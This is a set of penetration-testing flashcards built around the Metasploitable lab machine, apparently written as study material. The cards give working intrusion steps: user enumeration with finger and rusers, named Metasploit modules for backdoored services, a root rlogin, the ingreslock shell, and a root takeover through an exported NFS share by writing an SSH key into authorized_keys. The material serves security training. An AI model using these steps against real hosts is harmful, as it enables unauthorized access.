Appendix F Flashcards
What would the following command do
rusers -l 192.168.1.1
Show a list of users currently logged onto the host 192.168.1.1
What would the following command do
rwho 192.168.1.1
Show a list of users currently logged onto the host 192.168.1.1
What port does finger operate on
TCP 79
How can finger benefit an attacker
It can be used to enumerate users
What is the correct usage syntax for finger
finger user@192.168.1.1
What version of VSFTP has a backdoor built into it and can be exploited with a metasploit module
2.3.4
The vulnerable service distcc can be exploited to gain a shell using what metasploit module
exploit/unix/misc/distcc_exec
Why should Nmap never be installed with special privileges on Linux based operating systems
This could potentially make the server susceptible to the Setuid Nmap Exploit
What metasploit module should be used to exploit Setuid Nmap
exploit/unix/local/setuid_nmap
How would you exploit the misconfigured r login service on 192.168.1.1
rlogin -l root@192.168.1.1
How would you identify an NFS share on 192.168.1.1
probing TCP port 2049 or by using the following commands :
rpcinfo -p 192.168.1.1
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
showmount -e 192.168.1.1
Export list for 192.168.1.1 :
/*
How would you obtain access by mounting an NFS share
root@ubuntu:~# ssh-keygen
root@ubuntu:~# mkdir /tmp/r00t
root@ubuntu:~# mount -t nfs 192.168.1.1:/ /tmp/r00t/
root@ubuntu:~# cat ~/.ssh/id_rsa.pub»_space; /tmp/r00t/root/.ssh/authorized_keys
root@ubuntu:~# umount /tmp/r00t
root@ubuntu:~# ssh root@192.168.1.1
Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
What metasploit module is used to compromise the UnrealRCD IRC daemon
exploit/unix/irc/unreal_ircd_3281_backdoor
What port does ingreslock reside on and how can it be exploited
TCP 1524
Telnet 192.168.1.1 1524
What are the R*Services and their corresponding ports
rsh : Remote Shell : TCP 514
rauth : Remote Auth : TCP 513
rlogin : Remote Login : TCP 513
rexec : Remote Execution : TCP 512